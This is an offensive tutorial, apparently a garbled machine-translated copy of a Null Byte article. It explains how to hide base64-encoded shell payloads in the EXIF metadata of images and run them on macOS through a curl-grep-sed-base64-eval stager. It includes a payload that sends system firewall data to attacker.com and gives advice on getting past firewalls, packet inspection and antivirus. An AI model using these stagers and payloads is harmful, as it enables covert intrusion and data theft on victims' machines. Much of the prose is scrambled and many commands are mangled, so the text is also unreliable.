Complex shell scripts can be implanted in photo-metadata and later used to exploit a MacBook. In addition to obfuscating the true nature of an attack, this technique can be used to avoid network firewalls and vigilant sysadmin.
In this attack scenario, a malicious command will be embedded directly in EXIF metadata for an image file. The striker would host the malicious image on a public site like Flickr, making it available to anyone to download. A stager will then be created to download the image, extract the metadata and execute the embedded command.
To be clear, do not double-click the image file to execute the embedded command. It's another type of macOS attack, something we've dealt with in another article. Instead, the command will be hidden in the metadata of the image and used as a payload system. Stager and payload are two different aspects of the attack. The stager is designed to download the image and execute the embedded payload, while the payload is the last bit of code (embedded in the image) to execute one or more commands.
Why embed payloads in photos?
So, why has a stager at all about the attacker already capable of executing code on the target MacBook? Well, mainly, varying degrees of active tax evasion. Stagers can also be quite small, just ~ 100 characters long, making them faster to execute with a USB Rubber Ducky or MouseJack attack, for example.
In most scenarios, it is not possible to hide a payload in an image file. In very secure environments, but where each domain is logged by firewall software, it may be beneficial to hide the payload content and origin.
first Firewall Evasion
With software such as pfSense, each domain and IP address that each device on the network visits is logged. With commercial software such as Fortinet's FortiGate firewall, each package can be thoroughly dissected for analysis. These types of firewalls make it difficult for an attacker to use simple TCP connections established with Netcat to continue on the compromised device or to push the network card.
The use of images to hide payloads can make it difficult for sysadmins to monitor traffic to identify activity as malicious or suspicious.
2nd Deep Packet Inspection Evasion
In secured environments, operating systems can be configured to use proprietary certificates, allowing network administrators to decrypt data to and from devices on the network. With tools like Wireshark, it is possible to compile TCP streams and recover image files using the unused data.
3rd Antivirus Evasion
Premium versions of Avast and AVG antivirus software can analyze and detect certain types of stager and payload. For example, the AV software can identify most stays created by Empire. With hardened network environments, it may require a high degree of confusion to avoid detection signatures. Used stagers can make it difficult for AV software to detect the true nature of a particular file.
Tools to be familiar with
Before moving forward you should have a general comfort with tools like curl system_profiles exiftool grip and Bash scripts before continuing. All these substances have been covered at Null Byte before sometime in any way.
To get started download the image to be used in the attack. The stager (shown in a later step) does not actually save the image to the target computer, so it does not have to be a picture of something particularly relevant. For demonstration purposes, we can use my Twitter profile picture which can be downloaded with wget and saved ( -O ) to the / tmp directory.
] wget & https: //pbs.twimg.com/profile_images/944123132478189568/tgQESxWF_400x400.jpg' -O image.jpg
- 2019-05-15 06: 50: 22-- https: //pbs.twimg .com / profile_images / 944123132478189568 / tgQESxWF_400x400.jpg Solution pbs.twimg.com (pbs.twimg.com) ... 126.96.36.199, 2606: 2800: 220: 1410: 489: 141e: 20bb: 12f6 Connection to pbs.twimg.com (pbs.twimg.com) | 72,21,91,70 |: 443 ... connected. HTTP request sent, waiting for reply ... 200 OK Length: 19316 (19K) [image/jpeg] Save to: & # 39; image.jpg & # 39; image.jpg 100% [=================================>] 18.86K 64.4KB / s in 0.3s 2019-05-02 06:50:25 (64.4 KB / s) - image.jpg & # 39; saved [19316/19316]
For this example, we first learn to execute a simple point on the command. When the trainee runs the payload embedded in the image, it will create a blank file on the MacOS desktop "hacked".
First use printf base64 and tr to encode the payload. Base64 will encode the string, while tr will erase ( -d ) newlines () ). You should always attach the payload ( touch ~ / Desktop / hacked ) to simple quotes.
printf & # 39; touch ~ / Desktop / hacked & # 39; | base64 | tr-d & # 39;
A more complex payload involving the macOS system_profiles command can be used to perform situational awareness attacks as well as curl to exfil the command to the attacker's server.
printf & d; d = $ (system_profiler SPFirewallDataType); curl -s - data "$ d" -X POST http://attacker.com/index.php' | base64 | tr -d & # 39;
ZD0kKHN5c3RlbV9wcm9maWxlciBTUEZpcmV3YWxsRGF0YVR5cGUpO2N1cmwgLXMgLS1kYXRhICIkZCIgLVggUE9TVCBodHRwOi8vYXR0YWNrZXIuY29tL2luZGV4LnBocA ==  To take it a step further, it would be possible to encode an entire Bash script that has been compressed into one line. In my tests, there was no limit to the number of characters that can be embedded in a metadata group.
cat /path/to/any_script.sh | base64 | Wood 3: Embed the payload in the image
To insert the encoded payload into the image, install exifool .
apt-get update && apt-get install exiftool -V
Read the package listings ... Ready Building dependency tree Reads state information ... Ready Note, select "libimage-exiftool-perl" instead of "exifool" The following additional packages will be installed: libarchive-zip-perl (1.64-1) libmime-charset-perl (1.012.2-1) libposix-strptime-perl (0.13-1 + b5) libsombok3 (2.4.0-2) libunicode-linebreak-perl (0.0.20190101-1) Suggested packages: liben code male extract (0.23-5 + bl) libpod2 base perl (0.043-2) The following new packages will be installed: libarchive-zip-perl (1.64-1) libimage-exifool-perl (11.16-1) libmime-charset-perl (1.012.2-1) libposix-strptime-perl (0.13-1 + b5) libsombok3 (2.4.0-2) libunicode-linebreak-perl (0.0.20190101-1) 0 upgraded, 6 newly installed, 0 to remove and 0 not upgraded. The need to get 3,629 kbyte archives. After this operation, 21.0 MB of additional disk space will be used. Do you want to continue? [Y/n]
Delete all EXIF metadata that may be in the image.
exiftool -all = image.jpg
1 image file updated
Then use exiftool ] to add a metadata generator - it will work with any idle tag containing it encoded payload. Certificate tag is used in this demonstration.
exiftool -Certificate = & # 39; dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA == & # 39; image.jpg
1 image files updated
Once it is ready, verify the certificate tag correctly added by the following command exiftool . Notice the coded string on line 13.
01 ExifTool Version number: 11.16 02 Filename: image.jpg 03 directory :. 04 File size: 21 KB 05 File change date / time: 2019: 05: 02 06: 50: 57 + 00: 00 06 File access Date / Time: 2019: 05: 02 06: 50: 57 + 00: 00 07 File Inode Change Date / Time: 2019: 05: 02 06: 50: 57 + 00: 00 08 File permissions: rw-r - r-- 09 File type: JPEG 10 file extension: jpg 11 MIME type: image / jpeg 12 XMP Toolkit: Image :: ExifTool 11.16 13 certificates: dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA == 14 image width: 400 Image height: 400 16 coding process: Progressive DCT, Huffman coding 17 bits per sample: 8 18 color components: 3 19 Y Cb Cr Sub-sampling: YCbCr4: 2: 0 (2 2) 20 Image size: 400x400 21 Megapixels: 0.160
Step 4: Upload the image to a website
Finding a suitable website is tricky. The criteria for this are several times.
Many popular sites like Twitter, Imgur and Instagram automatically dry metadata from images when uploaded. It is mainly done to protect users from accidentally uploading images containing GPS coordinates that allow cyberstalkers and cyberbullies to harass and locate these users.
Images containing payloads would be dried when uploaded to regular sites. The candidate website must be tested manually by first uploading the image, then downloading it and using the exiftool to see if the embedded payload is still intact.
Transport layer security is important for further obfuscating this attack. The site used to host the image will use HTTPS, which will help prevent sysadmin from analyzing the GET request with surgical precision.
Ideally, the site used in the attack would be a frequent visitor of the target. For example, if the target visited a particular news site each morning, a visit to this domain would not be suspected of sysadmins monitoring the traffic on the network. On the other hand, an unusual GET request on a foreign website or adult site will probably increase some red flags. This type of information can be counted during the reconnaissance phase with secret packet catches. The key is to make the traffic as normal as possible for the goal's web behavior.
In my quick attempts to extract metadata from images with built-in MacOS tools, nobody seemed to access or display the particular string ("Certificate") of EXIF metadata that is embedded in the image. Fortunately, has a -a alternative that allows to process binary files (i.e., images) as if they were interest text, so that they could find the "Certificate" string in metadata .
Below is an example stager that can be used to download images, extract and decode payloads, and then run the command (s).
p = $ (curl -s https://website.com/image .jpg | grep Cert -a | sed & # 39; s / <[^>]> // g & # 39; | base64 -D) ; eval $ p
There are some things going on here, so I break down every section of the support.
- p = $ (...) - Most of the struts are enclosed in a variable called "p" (aka payload ) saved directly on the target's macOS hard disk.
- curl's homepage.com/image.jpg - Curl is used here to silently (-s) download the image containing the payload from a site chosen by the attacker. The image immediately piped (|) to the following grep command.
- grab Cert -a - Grab takes the rada image data, processes it as a regular text (-a) while searching for the "Cert" string. This output would be displayed in a terminal as below.
- sed & # 39; s / <[^>] * // // & # 39; - The above output is immediately piped into this custom command. Sed removes all surrounding XML data (ie
), leaving only the encoded string.
- base64 -D - The encoded string is piped into this bas64 command where it is decoded with the -D option, which ultimately makes the $ p variable the decoded payload.
- eval $ p - Finally, eval is used to evaluate the variable as a command, and effectively execute the payload in its variable form.
We can verify the attack that was successfully performed by finding the hacked file on the MacOS desktop.
Again, this is a very simple payload. More sophisticated attacks can involve automated browser dumping, microphone interception, enlightening awareness, privilege scaling, sudo password filtering, etc.
It is all there is to hide the payload within image metadata. Stay tuned, so I will show you how to exfoliate data inside images - without using metadata tags - in a future article! Notify me on Twitter @tokyoneon_ if you have any questions or leave a comment below.